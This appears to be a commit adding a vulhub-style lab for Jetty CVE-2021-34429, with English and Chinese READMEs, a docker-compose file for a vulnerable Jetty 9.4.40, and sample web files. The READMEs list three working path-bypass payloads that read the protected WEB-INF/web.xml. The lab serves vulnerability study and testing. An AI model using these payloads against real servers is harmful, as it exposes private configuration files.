first commit

jetty/CVE-2021-34429/README.md

@@ -0,0 +1,40 @@
+# Jetty Ambiguous Paths Information Disclosure Vulnerability (CVE-2021-34429)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Eclipse Jetty is a Java web server and Java Servlet container.
+
+Jetty 9.4.40 fixed an ambiguous paths information disclosure vulnerability [CVE-2021-28164](https://github.com/vulhub/vulhub/tree/master/jetty/CVE-2021-28164), CVE-2021-34429 is a variation and bypass of it.
+
+There are 3 types of payload that exfiltrate the content of `WEB-INF/web.xml`:
+
+- Unicode based URL encoded: `/%u002e/WEB-INF/web.xml`
+- `\0` with `.` bug:  `/.%00/WEB-INF/web.xml`
+- `\0` with `..` bug: `/a/b/..%00/WEB-INF/web.xml`
+
+The vulnerability affects the Jetty 9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5.
+
+References:
+
+- https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
+- https://xz.aliyun.com/t/10039
+
+## Vulnerable Application
+
+Execute the following command to start a Jetty 9.4.40 server.
+
+```
+docker compose up -d
+```
+
+After the server starts, visit ``http://your-ip:8080`` to see an example page.
+
+## Exploit
+
+The sensitive file web.xml is not accessible through `/WEB-INF/web.xml`.
+
+![](1.png)
+
+Use payload `/%u002e/WEB-INF/web.xml` to bypass the restriction:
+
+![](2.png)

jetty/CVE-2021-34429/README.zh-cn.md

@@ -0,0 +1,36 @@
+# Jetty WEB-INF 敏感信息泄露漏洞（CVE-2021-34429）
+
+Eclipse Jetty是一个开源的servlet容器，它为基于Java的Web容器提供运行环境。
+
+Jetty在9.4.40后修复了因为`%2e`导致的敏感信息泄露漏洞[CVE-2021-28164](https://github.com/vulhub/vulhub/tree/master/jetty/CVE-2021-28164)，但这个修复是不完全的，通过下面三种方式可以进行绕过：
+
+- unicode形式URL编码：`/%u002e/WEB-INF/web.xml`
+- `\0`组合`.`导致的绕过：`/.%00/WEB-INF/web.xml`
+- `\0`组合`..`导致的绕过：`/a/b/..%00/WEB-INF/web.xml`
+
+影响版本：9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5
+
+参考链接：
+
+- https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
+- https://xz.aliyun.com/t/10039
+
+## 漏洞环境
+
+执行如下命令启动一个Jetty 9.4.40：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080`可以查看到一个example页面。
+
+## 漏洞复现
+
+直接访问`/WEB-INF/web.xml`将会返回404页面：
+
+![](1.png)
+
+使用`/%u002e/WEB-INF/web.xml`来绕过限制下载web.xml：
+
+![](2.png)

jetty/CVE-2021-34429/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '2.2'
+services:
+  web:
+    image: vulhub/jetty:9.4.40
+    ports:
+      - "8080:8080"
+    volumes: 
+      - ./src:/opt/jetty/webapps/ROOT

jetty/CVE-2021-34429/src/WEB-INF/web.xml

@@ -0,0 +1,7 @@
+<!DOCTYPE web-app PUBLIC
+ "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
+ "http://java.sun.com/dtd/web-app_2_3.dtd" >
+
+<web-app>
+  <display-name>Archetype Created Web Application</display-name>
+</web-app>

jetty/CVE-2021-34429/src/index.jsp

@@ -0,0 +1,47 @@
+
+<!doctype html>
+<html>
+<head>
+    <title>Example Domain</title>
+
+    <meta charset="utf-8" />
+    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1" />
+    <style type="text/css">
+        body {
+            background-color: #f0f0f2;
+            margin: 0;
+            padding: 0;
+            font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
+            
+        }
+        div {
+            width: 600px;
+            margin: 5em auto;
+            padding: 2em;
+            background-color: #fdfdff;
+            border-radius: 0.5em;
+            box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
+        }
+        a:link, a:visited {
+            color: #38488f;
+            text-decoration: none;
+        }
+        @media (max-width: 700px) {
+            div {
+                margin: 0 auto;
+                width: auto;
+            }
+        }
+    </style>
+</head>
+
+<body>
+<div>
+    <h1><% out.println("Example Domain"); %></h1>
+    <p>This domain is for use in illustrative examples in documents. You may use this
+    domain in literature without prior coordination or asking for permission.</p>
+    <p><a href="https://www.iana.org/domains/example">More information...</a></p>
+</div>
+</body>
+</html>